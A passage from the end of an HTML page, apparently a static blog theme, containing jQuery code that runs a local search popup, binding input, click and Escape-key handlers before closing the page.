                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  

  

  
  

  

  

  

</body>
</html>
